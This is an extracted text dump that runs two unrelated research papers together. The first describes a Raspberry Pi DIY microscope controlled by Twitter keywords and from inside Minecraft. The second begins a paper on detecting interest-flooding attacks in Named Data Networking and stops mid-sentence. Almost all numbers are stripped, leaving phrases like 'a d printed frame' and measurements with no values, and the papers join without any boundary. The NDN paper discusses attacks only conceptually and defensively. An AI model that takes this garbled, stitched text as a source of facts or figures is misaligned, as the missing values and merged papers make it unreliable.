virtual world and use gaming actions to control a physical diy microscope. simple actions inside of the videogame allowed one to again adjust microscope focus, capture single images or initiate time-lapse recordings. in this case, the images are stored locally on the rpi hard drive. in this embodiment, there is no need for a consistent or reliable internet connection. to our knowledge, this is the only social media and video game controlled microscope. materials and methods diy microscope a basic diy microscope was constructed by employing strategies that have been previously demonstrated (cybulski, clements & prakash, ; switz, d’ambrosio & fletcher, ; cavanihac, ). briefly, the microscope was constructed using a raspberry pi (rpi) model b+ as the control computer, an rpi camera module (rasperry pi foundation, cambridge, uk), a discarded computer dvd-rom drive and a d printed frame (makerbot replicator ; makerbot, brookyln, ny, usa) (fig. a). all d printer files are available online at http://www.thingiverse.com/pellinglab. the original lens from the rpi camera module was removed prior to installation, leaving only the image sensor (omnivision ov - mpx; omnivision, santa clara, ca, usa). a web camera lens (logitech c ) was then inverted leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.thingiverse.com/pellinglab http://dx.doi.org/ . /peerj-cs. figure diy microscope construction. (a) a case was d printed in order to mount the rpi computer, camera and lens assembly and dvd-rom drive chassis. a sample stage was also d printed and mounted to the laser pickup assembly. (b) a simple motor driver was then employed to control the stepper motor with the gpio pins of the rpi. (c) calibration of the microscope was achieved by acquiring images of mi- crofabricated atomic force microscopy cantilevers. the lower cantilever has a known length of µm, corresponding to pixels in the image (scale bar= µm). full-size doi: . /peerjcs. /fig- leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. and installed on top of the image sensor. the rpi camera module and the lens were maintained in fixed positions relative to one another by mounting in a d printed mount. the dvd-rom drive was then disassembled leaving only the stepper motor, the laser pickup assembly and the frame intact. the drive was then mounted perpendicular to the rpi camera assembly in order to create a sample positioning stage that could be moved along the optical axis of the microscope in an inverted configuration. in order to fix the positions of each component of the entire assembly, a d printed frame was produced to which all components could be mounted. finally, a sample stage was d printed and mounted to the laser pickup assembly. this configuration allowed us to easily adjust sample position and focus under computer control. the movement of the sample tray was achieved by controlling the movement of the stepper motor by employing the easy driver stepper motor driver v . (http://www.schmalzhaus.com/easydriver) in -step micro stepping mode. the driver and a standard mm white led were connected to rpi via gpio pins in order to control sample positioning and illumination (fig. b). to calibrate the diy microscope, we acquired images of standard microfabricated cantilevers commonly employed used in atomic force microscopy. the cantilevers have known dimensions. the larger cantilever in the image is µm, corresponding to pixels in a , by pixel image (fig. c). online control of the diy microscope a python script was written that allows any twitter subscriber to remotely interact with the microscope via the twitter app or website. the code we developed is available online at https://github.com/pellinglab. the open source python library tweepy (http://www.tweepy.org) was employed to facilitate communication with twitter’s application programming interface (api). the microscope was assigned the twitter account @diymicroscope in order to facilitate user interaction. the python script running on the rpi monitors ‘tweets’ sent to the account @diymicroscope and examines them for simple key words. for example, the twitter user can capture single images, control sample positioning and focus, and initiate time-lapse imaging (details are presented in the ‘results and discussion’ section). online image capture and storage the rpi storage capacity can be limited as it is defined by the capacity of the sd card the user has employed. in order to prevent memory issues associated with a large number of image acquisitions, we utilized the photo-sharing website flickr (flickr.com), as an image hosting platform. to remotely and automatically interact with the flickr api, we implemented the beej flickr api python library (http://stuvel.eu/flickrapi). each time an image is acquired by the script (i.e., a single frame or a concatenate of frames), a copy is uploaded to the diy microscope’s flickr account. then the original image is removed then from the rpi hard drive to save space. offline control of the diy microscope to locally control the microscope, we designed a python script that will create a user interface in the videogame universe of minecraft (mojang). the code we developed is leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.schmalzhaus.com/easydriver https://github.com/pellinglab http://www.tweepy.org https://twitter.com/diymicroscope https://twitter.com/diymicroscope https://flickr.com http://stuvel.eu/flickrapi http://dx.doi.org/ . /peerj-cs. available online at https://github.com/pellinglab. we constructed a virtual lab in which user actions during game play can be used to initiate specific microscope functions. to achieve this, we employed the minecraft python api library (http://www.stuffaboutcode. com/p/minecraft-api-reference.html). inside the virtual laboratory, the sword-equipped player can control the microscope by performing specific actions with ‘control blocks’ inside the virtual laboratory. block actions were designed to allow the user to generate a live preview, capture an image and adjust the stage position for focus control. captured images are stored in a specific local folder for future use. results and discussion software design for twitter control when the python script is launched, an authentication procedure to flickr is initiated (a yahoo! account, api key and api secret are required), followed by an authentication to twitter (a twitter account, api key and api secret, token and secret token are required). both accounts must be established and verified by the system administrator in advance. the flickr account is required for storage of images acquired by the diy microscope. the diy microscope will be addressed and controlled by sending ‘tweets’ that mention the system specified twitter account. when the authentication between flickr and twitter is correctly established, the script connects to twitter’s streaming api with specific keywords. this allows the program to obtain real-time tweets from the social network. when a user sends a tweet to the system-specified twitter account containing single, or multiple, keywords, a javascript object notation (json) object is returned by the streaming api, containing parameters such as the user name, screen name, location, tweet content and the time. the json object is then examined and conditional actions are undertaken depending on the keywords identified in the tweet (fig. ). importantly, to avoid any unwanted interactions with the diy microscope (i.e., a random user has one of the keywords in their tweets), the requesting user must include the system-specified twitter handle (e.g., @example) in their tweet. in this embodiment, we designed four types of user interaction, such as taking a single image, initiating a timelapse, adjusting the focus and obtaining a ‘focus group’ image (figs. and ). when the tweet contains the keyword ‘singleimage’ (fig. a), the current image frame captured by the rpi camera is temporarily stored on the rpi, a scale bar is drawn on the image and returned to the requesting user in a twitter message (fig. b). in addition to the returned image, the reply tweet also includes the message ‘@user scale bar is x_units’’, where @user is the twitter handle of the requesting user and x_units=value determined by the user after microscope calibration. finally, the temporarily stored local copy of the image is then uploaded to the user specified flickr account and permanently removed from the rpi. in fig. , a single image is requested by the user @pellinglab and an image of cellulose derived from apples (modulevsky et al., ) is acquired and returned by the microscope. to move the stage in order to focus the sample, the user sends a tweet to the diy microscope that includes the keywords ‘diyfocus further n’ or ‘diyfocus closer n’ (n = leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/pellinglab http://www.stuffaboutcode.com/p/minecraft-api-reference.html http://www.stuffaboutcode.com/p/minecraft-api-reference.html http://dx.doi.org/ . /peerj-cs. figure flow-chart representing our python script that enables twitter-based user interaction with the diy microscope. full-size doi: . /peerjcs. /fig- integer value). the sample stage will then move further away, or closer to, the rpi camera by n microsteps. an image will be acquired after moving to the new position, sent back to the user through twitter and stored on flickr as above. if the user wants to sample multiple focus positions, a tweet is constructed which includes the keywords ‘diyfocus dofocus n’ (n = integer value). in this scenario, the sample platform is moved away from the rpi camera by n microsteps and an image is acquired. the sample then moves another n microsteps away from the camera a second image is obtained before moving back to the original position. the process is then repeated in the opposite direction in order to acquire image number and . the four locally stored images are uploaded to flickr, along with their metadata (the twitter handle of the requesting user, the original message sent by the user, n and the corresponding frame number), and then concatenated into a single by pixel image (fig. a). the concatenated image is then returned to the user with the corresponding frame numbers printed on each sub-image along with the message ‘@user your n microstep dofocus sequence is complete’ (where @user and n are determined from the original user message). the user can now adjust the stage position to the desired leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure twitter acquisition of a single image from the diy microscope. (a) the account @pellinglab initiates image acquisition by posting a tweet that mentions the account @diymicroscope and includes the keyword ‘singleimage’. other text can be included in the message but the script will ignore them. (b) the diy microscope acquires an image and responds to the resting account. full-size doi: . /peerjcs. /fig- location (using the ‘diyfocus further/closer’ keywords, followed by an appropriate integer value). in fig. a, the concatenated image of a hematoxylin and eosin stained histology sample being moved in and out of focus is shown. finally, the user can initiate a time lapse using the ‘diytimelapse duration d frequency f’ keywords, replacing the ‘d’ and ‘f’ with integers for duration and frequency, respectively. the d and f, values assume units of minutes and frames/minute, respectively. the timelapse is carried out as requested and each acquired image is uploaded to flickr along with its corresponding metadata (the twitter handle of the requesting user, the original message sent by the user, d, f and the corresponding frame number). upon completion of the timelapse, a concatenated image containing the first and last frame of the time lapse is constructed and returned to the user with the frame numbers printed on each sub-image (fig. b). the returned image also includes the message ‘@user your timelapse of d minutes at f frames/minute is now complete’ (where @user, d and f are determined leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://twitter.com/pellinglab https://twitter.com/diymicroscope https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure focus and time-lapse control through twitter interactions. (a) the command ‘diyfocus dofo- cus n’ initiates image capture of the sample when moved to four specific positions. the user is then pro- vided with a concatenated image containing the four acquired, and indexed, images. this routine allows the user to determine the optimal sample position in order to set the focus. (continued on next page...) full-size doi: . /peerjcs. /fig- leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure (...continued) in this case, a sample histology slide was employed for imaging. as these images are only for stage posi- tioning purposes no scale bar is included; however, each image is . × . mm. (b) it is also possible to initiate time-lapse imaging using the keywords ‘diytimelaspe duration d frequency f’, d and f, corre- spond to integer values with units of minutes and frames/minute, respectively. in this case, brine shrimp (artemia—commonly grown as live feed for fish larva) were imaged with the microscope. a final image is returned to the user that only contains the first and last image acquired during the timelapse interval. all images from the sequence are stored on flickr along with any relevant metadata. no scale bar is provided in this example; however, the scale is known after user calibration and relevant details are included in the flickr metadata. in this case each image is . × . mm. from the original user message). in fig. b, time-lapse microscopy was conducted on a sample of artemia (brine shrimp) and the image sent back to the user through twitter is shown. four images were acquired (duration of one minute at a frequency of four images per minute) and as described above, only the first and last images are sent to the user through twitter. all images in the sequence are stored on flickr for later analysis by the user. importantly, whenever an image is uploaded to flickr (irrespective of the keyword(s) employed), specific metadata is included with the image in order to allow for identification and filtering. the metadata associated with each image includes the twitter handle of the requesting user, the keyword(s), a timestamp and the frame number. software design for minecraft control in situations where a user may lack internet access, we designed an approach for local, offline, control of the diy microscope. in this case, we designed a python script that allows for user interaction through the videogame minecraft (fig. ). conveniently, minecraft is already included in the freely available raspbian distribution of linux for the rpi. when our python script is launched, the player position is immediately updated to be facing the virtual ‘laboratory’ (fig. ). upon entering the laboratory, a sword-equipped player can now interact with the diy microscope ‘control blocks’ (fig. a). when standing in front of the desired control block, the right mouse button can be used to initiate a specific action. such actions will return an event object, containing the coordinates of the specific block as a tuple. the coordinate tuple is then used to initiate conditional actions that are used to control the ‘real-life’ diy microscope. when the player activates one the extremity blocks (black and grey blocks), the stepper motor will perform n microsteps clockwise (or counterclockwise). the user can specify n in the python script. the yellow block will display a live preview of the sample, on a by pixels window (fig. b). the blue blocks will take a single image when activated, and save the image as a ‘‘.png’’ file on the rpi. to avoid over usage of the gpu memory, the program will close live preview (if open) prior to acquiring an image. a message on the minecraft user-interface is displayed when the image is successfully stored (fig. c). leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure flow-chart representing our python script that enables minecraft-based user interaction with the diy microscope. full-size doi: . /peerjcs. /fig- conclusions possible limitations the twitter public streaming api limits the application to a fixed number of keyword filters per application (twitter, inc, ). the current application only requires keywords (‘‘singleimage’’,’’diyfocus’’ and ‘‘diytimelapse’’) to initiate user-interaction, however, more complex interactions may require many more keywords. as well, user-interaction is also limited by the number of allowed connections to the api per hour (twitter, inc, ) but the exact number is not currently publically available. importantly, a user will also receive an error message from twitter if they post the exact same tweet multiple times leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the minecraft environment. (a) the user simply uses the sword to control a locally connected diy microscope by interacting with the four control blocks inside of a virtual ‘laboratory’. the blocks al- low the user to adjust the sample stage up and down (black/gray blocks), (b) obtain a live preview (yel- low block) and (c) acquire an image (cyan block). full-size doi: . /peerjcs. /fig- leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. over a short time period. therefore, twitter will not allow a single user to post the tweet ‘@diymicrosocpe singleimage’ more than once. the user can overcome this limitation by adding more text to the tweet or deleting the original tweet. currently, the flickr api also limits the application to , requests per hour (yahoo!, ). some other limitations can also arise if multiple users are attempting to interact with the microscope simultaneously. for instance, if a time-lapse sequence is initiated, the script will complete the image acquisition before returning to the stream listener. in this case, a user sending a request will not get an immediate response from the microscope. finally, the microscope is inherently limited to the presence and stability of internet connectivity available to the rpi. in the case of a lost connection, the script will have to be re-executed in order to establish a connection to the twitter streaming api and flickr api. to overcome the issue with internet connectivity, we also implemented a control interface within the minecraft universe. of course, electrical power is always required as with any modern microscope. however, it is possible to power the rpi using solar panels and batteries in cases where microscopic imagery is required but electrical connections are not easily accessed. as the minecraft implementation of the diy microscope stores pictures locally, the maximum storage space will depend on the sd card capacity. cloud storage can be implemented with the minecraft program, but will require an internet connection. however, if storage space becomes a limitation, the user can move the files to an alternative storage device (usb stick or via local file transfer) or employ a larger sd card. possible extensions future versions of both the twitter and minecraft interfaces could include image analysis features, such as cell counting, cell tracking for time lapses, image redundancy protections and thresholding by implementing opencv or other methods (itseez, ). such integration could allow the user to obtain qualitative and quantitative from the sample, in a remote or local way. an automatic focusing library could also be implemented to both program to enhance image quality acquisition rapidity. in its current implementation, our approach does not maintain privacy as all micro blogging posts and pictures on twitter and flickr are publicly available. in order to overcome this potential limitation, a smart phone based application could easily be developed to interact with the current version of the microscope, either via a direct connection (wifidirect or bluethooth) or a web-based server. such a configuration could allow the user to use customize features, independent from twitter, flickr and minecraft apis, consequently avoiding the rate limitation from the third-parties. this will also be important for the implementation of a potential multi-user platform. although the purpose of this study was to present a proof-of-concept implementation of using social media and video games to control our microscope, one can imagine extending this platform to allowing multi-user experiments. future work will require rigorous testing to ensure the robustness of our embodiment for such applications. of potential interest is that both of our approaches can also be exploited on other types of laboratory equipment. one can easily interface the multiple outputs of the rpi to an existing or ‘‘hand-made’’ equipment, or extends existing programs (baden et al., ; keulartz & van den belt, ; pearce, ; landrain et al., ). future use of leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the minecraft program can let access to multiple player in the ‘‘virtual laboratory’’, either by a local or internet connection. this let the possibility for the ‘‘players’’ to cooperatively interact and controls ‘‘real’’ physical laboratory equipment inside a virtual world. acknowledgements the authors would like to thank daniel modulevsky and dr. charles cuerrier for providing the histological sample for imaging. additional information and declarations funding this work was supported by the national sciences and engineering research council discovery grant. andrew e. pelling is supported by the canada research chairs program. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national sciences and engineering research council discovery grant. canada research chairs program. competing interests the authors declare there are no competing interests. author contributions • maxime leblanc-latour conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • craig bryan conceived and designed the experiments, contributed reagents/materials/- analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. • andrew e. pelling performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://github.com/pellinglab/minerscope_and_twitterscope. references baden t. . biropette: customisable, high precision pipette. thingiverse. available at http://www.thingiverse.com/thing: . leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/pellinglab/minerscope_and_twitterscope http://www.thingiverse.com/thing: http://dx.doi.org/ . /peerj-cs. baden t, chagas am, gage g, marzullo t, prieto-godino ll, euler t. . open labware: -d printing your own lab equipment. plos biology ( ):e doi . /journal.pbio. . cavanihac j-m. . diy: an inverted microscope with electronicfocusing. micscape magazine. available at http://www.microscopy-uk.org.uk/mag/indexmag.html?http: //www.microscopy-uk.org.uk/mag/artaug /jmc-constr .html. chai biotechnologies inc. a. openpcr—the $ open source pcrmachine/thermal cycler. available at http://openpcr.org/ . chai biotechnologies inc. b. open qpcr: the $ real-time pcr machine. available at https://www.chaibio.com/openqpcr. contreras-naranjo jc, wei q, ozcan a. . mobile phone-based microscopy, sensing, and diagnostics. ieee journal of selected topics in quantum electronics ( ): – doi . /jstqe. . . cybulski js, clements j, prakash m. . foldscope: origami-based paper microscope. plos one ( ):e doi . /journal.pone. . garvey c. . arduino water bath for diybio. available at https://github.com/ cathalgarvey/kettlekontroller. ibanez l. . the kitware blog—diy microscopy: optical mouse lens + ipad. available at http://www.kitware.com/blog/home/post/ . itseez. . opencv. available at http://opencv.org/ . keulartz j, van den belt h. . diy-bio—economic epistemological and ethical implications and ambivalences. life sciences, society and policy ( ): – doi . /s - - - . kim h, gerber lc, riedel-kruse ih. . nteractive biotechnology: building your own biotic game setup to play with living microorganisms. in: proceedings of the chi conference extended abstracts on human factors in computing systems. new york: acm, – . landrain t, meyer m, perez am, sussan r. . do-it-yourself biology: challenges and promises for an open science and technology movement. systems and synthetic biology ( ): – doi . /s - - - . long j. . gel electrophoresis system (mini). available at http://www.instructables. com/id/gel-electrophoresis-system-mini/ . mcleod e, ozcan a. . unconventional methods of imaging: computational mi- croscopy and compact implementations. reports on progress in physics ( ): doi . / - / / / . miller j. . open source orbital shaker. available at https://www.thingiverse.com/ thing: . modulevsky dj, lefebvre c, haase k, al-rekabi z, pelling ae. . apple derived cellulose scaffolds for d mammalian cell culture. plos one ( ):e doi . /journal.pone. . pearce jm. . materials science. building research equipment with free, open-source hardware. science ( ): – doi . /science. . leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pbio. http://www.microscopy-uk.org.uk/mag/indexmag.html?http://www.microscopy-uk.org.uk/mag/artaug /jmc-constr .html http://www.microscopy-uk.org.uk/mag/indexmag.html?http://www.microscopy-uk.org.uk/mag/artaug /jmc-constr .html http://openpcr.org/ https://www.chaibio.com/openqpcr http://dx.doi.org/ . /jstqe. . http://dx.doi.org/ . /journal.pone. https://github.com/cathalgarvey/kettlekontroller https://github.com/cathalgarvey/kettlekontroller http://www.kitware.com/blog/home/post/ http://opencv.org/ http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://www.instructables.com/id/gel-electrophoresis-system-mini/ http://www.instructables.com/id/gel-electrophoresis-system-mini/ http://dx.doi.org/ . / - / / / https://www.thingiverse.com/thing: https://www.thingiverse.com/thing: http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. pelling ae. . diy co incubator bioreactor for mammalian cell culture. available at https://www.pellinglab.net/single-post/diy/diy-co -incubator-bioreactor-for- mammalian-cell-culture. skandarajah a, reber cd, switz na, fletcher da. . quantitative imaging with a mobile phone microscope. plos one ( ):e doi . /journal.pone. . smith zj, chu k, espenson ar, rahimzadeh m, gryshuk a, molinaro m, dwyre dm, lane s, matthews d, wachsmann-hogiu s. . cell-phone-based platform for biomedical device development and education applications. plos one ( ):e doi . /journal.pone. . switz na, d’ambrosio mv, fletcher da. . low-cost mobile phone mi- croscopy with a reversed mobile phone camera lens. plos one ( ):e doi . /journal.pone. . synbiota. . synbiota homepage. available at https://synbiota.com/ . twitter, inc. . connecting to a streaming endpoint. available at https://dev.twitter. com/streaming/overview/connecting. watts m. . magnetic stirrer. available at http://www.teklalabs.org/magnetic-stirrer/ . wong ap, gupta m, shevkoplyas ss, whitesides gm. . egg beater as centrifuge: isolating human blood plasma from whole blood in resource-poor settings. lab chip ( ): – doi . /b c. wong g, wong i, chan k, hsieh y, wong s. . a rapid and low-cost pcr thermal cycler for low resource settings. plos one ( ):e doi . /journal.pone. . yahoo!. . flickr: the flickr developer guide—api. available at https://www.flickr. com/services/developer/api/ . zhu h, mavandadi s, coskun af, yaglidere o, ozcan a. . optofluidic fluorescent imaging cytometry on a cell phone. analytical chemistry ( ): – doi . /ac a. leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.pellinglab.net/single-post/diy/diy-co -incubator-bioreactor-for-mammalian-cell-culture https://www.pellinglab.net/single-post/diy/diy-co -incubator-bioreactor-for-mammalian-cell-culture http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. https://synbiota.com/ https://dev.twitter.com/streaming/overview/connecting https://dev.twitter.com/streaming/overview/connecting http://www.teklalabs.org/magnetic-stirrer/ http://dx.doi.org/ . /b c http://dx.doi.org/ . /journal.pone. https://www.flickr.com/services/developer/api/ https://www.flickr.com/services/developer/api/ http://dx.doi.org/ . /ac a http://dx.doi.org/ . /peerj-cs. detection of malicious consumer interest packet with dynamic threshold values detection of malicious consumer interest packet with dynamic threshold values adnan mahmood qureshi , nadeem anjum , rao naveed bin rais , masood ur-rehman and amir qayyum computer science, capital university of science and technology, islamabad, pakistan college of engineering and it, ajman university, ajman, united arab emirates james watt school of engineering, university of glasgow, glasgow, uk abstract as a promising next-generation network architecture, named data networking (ndn) supports name-based routing and in-network caching to retrieve content in an efficient, fast, and reliable manner. most of the studies on ndn have proposed innovative and efficient caching mechanisms and retrieval of content via efficient routing. however, very few studies have targeted addressing the vulnerabilities in ndn architecture, which a malicious node can exploit to perform a content poisoning attack (cpa). this potentially results in polluting the in-network caches, the routing of content, and consequently isolates the legitimate content in the network. in the past, several efforts have been made to propose the mitigation strategies for the content poisoning attack, but to the best of our knowledge, no specific work has been done to address an emerging attack-surface in ndn, which we call an interest flooding attack. handling this attack-surface can potentially make content poisoning attack mitigation schemes more effective, secure, and robust. hence, in this article, we propose the addition of a security mechanism in the cpa mitigation scheme that is, name-key based forwarding and multipath forwarding based inband probe, in which we block the malicious face of compromised consumers by monitoring the cache-miss ratio values and the queue capacity at the edge routers. the malicious face is blocked when the cache-miss ratio hits the threshold value, which is adjusted dynamically through monitoring the cache-miss ratio and queue capacity values. the experimental results show that we are successful in mitigating the vulnerability of the cpa mitigation scheme by detecting and blocking the flooding interface, at the cost of very little verification overhead at the ndn routers. subjects computer networks and communications, emerging technologies, security and privacy keywords content poisoning attacks, named data networking, maliciousconsumer interestpacket, mitigation techniques, dynamic threshold introduction named data networking (ndn) is a well-known and well-researched architecture for the next generation of the internet, based on a data-centric approach. while the legacy network is based on a host-centric system, the ndn architecture has changed the internet’s communication model altogether (jacobson et al., ). it allows the distribution of data that can be acquired from any content router from the network. how to cite this article qureshi am, anjum n, rais rnb, ur-rehman m, qayyum a. . detection of malicious consumer interest packet with dynamic threshold values. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted february published march corresponding author nadeem anjum, nadeem.anjum@cust.edu.pk academic editor vicente alarcon-aquino additional information and declarations can be found on page doi . /peerj-cs. copyright qureshi et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:nadeem.�anjum@�cust.�edu.�pk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ a content provider can produce the data in advance and place it as auxiliary storage that can be accessed by any consumer anytime, even if the producer gets offline. a producer does not have to be online, and a consumer does not have to be connected to the producer to fetch the data; instead, the consumer can acquire data through in-networking caches. while ndn increases content availability in the network via in-network caching, the integrity of content becomes critical, given ndn’s nature (tarkoma, ain & visala, ). hence, ndn opens several security-related issues that are not relevant to the legacy network communication. it includes some new types of data integrity attacks where a malicious or compromised node provides a corrupted copy of the content. these issues are often ignored in ndn-related communication and caching mechanisms and are our main focus in the article. one of the most critical attack vectors in ndn is the content poisoning attack. the attacker compromises the content router (cr), and this compromised cr sends a reply to the legit request with totally bogus or corrupted content. this poisoned content pollutes the in-network caches of intermediate ndn routers and thus deprives the consumers of the requested content’s legitimate copy. hu et al. ( ) proposed a comprehensive scheme to mitigate the content poisoning attack (cpa). a special interest packet is generated by the consumer, which contains the hash of the poisoned data. this article is all about the identification and mitigation of security flaws that can be exploited by the attacker during this cpa mitigation process. the research problem lies in the cpa mitigation scheme proposed by hu et al. ( ). a consumer with malicious intent can flood the network with the interest packet containing the hash digest of legit or un-poisoned data. this hash is stored in its exclude filter field. during cpa mitigation, this packet can flood the network, which will enable multipath forwarding and on-demand verification of hash at the router. this flooding attack can severely affect the throughput of the network or even cause a denial of service for other legitimate consumers. therefore, it is essential to mitigate and add this additional security feature along with cpa mitigation (qureshi & anjum, ). in this article, we proposed a scheme to detect the flooding attack generated by the compromised consumer. a satisfaction test is performed to check if the excluded interest packet is non-existent in the cache or a legit packet. if the cache miss ratio (of the excluded interest packet) reaches the threshold value, it is considered an attack. a lightweight parameter is added to the content store data structure, which stores cache miss counter value. this value is compared with the specified threshold value. when the cache miss counter reaches near that threshold value, an event is raised that blocks the incoming malicious face. also, in our scheme, we made the threshold value adaptable. at first, the initial threshold value is calculated by taking the total buffer size and divided it by the verification rate. the proposed idea is that when cache miss ratio avg crosses %, and queue capacity saturates, the threshold value is reduced to half. this process continues until the value is thrashed to one. qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the articles’s main contribution is the addition of a security feature that fills up the attack surface that can be exploited by the malicious consumer. our contributions are: � adjustment of the threshold value dynamically by monitoring the cache-miss ratio value and queue capacity. � detection and mitigation of the flooding attack of special interest packets generated while mitigating the content poisoning attack. further, this article is organized into five sections; the second section emphasizes the literature review and related work. the third section is the proposed approach, and in the fourth section, experiments and results are highlighted along with the conclusion in the fifth section. related work any network’s primary goal is to share web content, including photographs, texts, and videos. implementing security standards and goals such as confidentiality, integrity, and accessibility can ensure robust and flawless communication. privacy guarantees that only the approved individual shall access the data. integrity means that the receiver’s received data must be similar to the one sent by the sender. availability ensures that network infrastructure should be available for an authorized user whenever he needs the service (wein et al., ). kumar et al. ( ) and hassanein & zulkernine ( ) explained some of the most common attacks within the existing tcp/ip model such as denial of service (dos) attack, distributed denial of service (ddos) attack, eavesdropping (snooping), masquerading, tcp replay attack, man in the middle attack, repudiation, and traffic analysis attack. these legacy attacks are not possible in ndn because of the absence of the host, but with the advent of this new architecture, some new attack surfaces have emerged which need to be addressed and it is an active research area. ndn’s data-centric security and security issues in ndn at the network layer of ndn, data-centric security is mandated via a digital signature on each data packet. a digital signature is added by the content provider (producer) to every data packet associating the data to the packet name when data is being generated. authentication can be performed by the consumer on the data packet by verifying the signature using the content providers’ public key. this authentication can be performed even if the data is retrieved from some other entity other than the content provider (ribeiro et al., ). zhang et al. ( ) stated that if a content providers’ public key is not distributed or the consumer has no information about this public key, in that case, the data producer places the signing key name into the specific field of the data packet. it is known as the keylocator field. a consumer can acquire a public key by following this field of keylocator and can retrieve it just like a normal data packet. kumar et al. ( ) explained some of the most common attacks within the existing tcp/ip model such as qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ denial of service (dos) attack, distributed denial of service (ddos) attack, eavesdropping (snooping), masquerading, tcp replay attack, man in the middle attack, repudiation, and traffic analysis attack. in a modification attack, the attacker does not only compromise the confidentiality of the data by accessing it but also compromises the integrity of the data by trying to alter it. however, this attack is not possible in ndn, because each piece of data is signed by the publisher, which the consumer can verify. however, if the router itself is compromised and alters the data packet, then a corrupted data packet may be sent to the consumer. consumers after receiving the publishers’ public key can validate this corrupted data. in a masquerading attack, the attacker masks his identity and impersonates to be another person so he/she can acquire some useful information about that person. however, this attack is also not possible in ndn because every piece of data chunk is signed by the publisher using his/her private key. in a replay attack, the attacker performs man in the middle attack and tries to get a copy of the message from the sender, then after modifying the message and he/she sends it to the receiver. the recipient assumes that the actual sender has forwarded the message but in fact, it is the modified message from the attacker with malicious intent. this type of attack is also not possible in ndn because the interest packet is identified by the name and for the uniqueness of the namespace in the network, a nonce is used. when the same interest packet reaches the router (with the same name and nonce), the router assumes the packet is duplicate and it is replayed; it will, therefore, be purged from the pit table. ndn, therefore, protects itself at the network layer level from the replay attack. in ndn architecture, some inherent security features protect us from some of the legacy security attacks by default but still there are some emerging security concerns in this new architecture that needs to be addressed. security, privacy, and access control are the three major domains that need to be covered in ndn architecture. several attacks are possible in ndn such as content poisoning attack, content pollution attack, naming attack, and denial of service attack. in privacy, it can be classified into five categories such as content privacy, signature privacy, client privacy, name privacy, and cache privacy (wein et al., ; ahlgren et al., ; zhang et al., ; hassanein & zulkernine, ). in access control, there is some mechanism that needs to be addressed are content encryption, content attributes, clients’ identity, and authorized sessions. table ndn attack types. attack types adversary victim compromised security goal ndn element involved in attack flooding attack of interest packet consumer consumer/ router/producer availability pit cache pollution attack consumer consumer availability cs privacy attack consumer consumer confidentiality cs content poisoning attack producer or router consumer/router integrity/availability cs qureshi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ attack types in ndn in ndn there are four main types of security threats that are briefly discussed in the coming sections and the attack effects on the security goals are mentioned in table (kumar et al., ; tourani et al., ). foodig attack of interest packet benmoussa et al. ( , ) explained in details the effects of an interest flooding attack, in which, an attacker can deplete the network resources by flooding the network with a large number of interest packets batches. pit, network bandwidth, and producer resources availability to the legit users will be compromised with this attack. this attack consumes ndn resources that restrict legitimate users from accessing them. cache pollution attack wang et al. ( ) discussed the anatomy of cache pollution attack, the attacker attempts to fill the cache with unwanted content in the ndn router by demanding the data packets which are unpopular and not in demand. as a result, the ndn routers’ impact ratio decreases. therefore, the cache hit ratio of the interest packet of the legitimate user will thrash. this will increase the latency and reduce the throughput of the network. cache privacy attack during an assault on cache privacy, the attacker wants to figure out whether or not the sensitive data has been accessed recently. a newly accessed item lies in the routers’ cache and the requester gets a quick response to these types of data. the intruder compiles a list of content that is vulnerable to privacy and asks them one by one to know whether it is cached or not by noticing the delay in retrieving the content. if the content is identified, the attacker can conclude that a user or a group of users has recently accessed the content. the adversary will know the 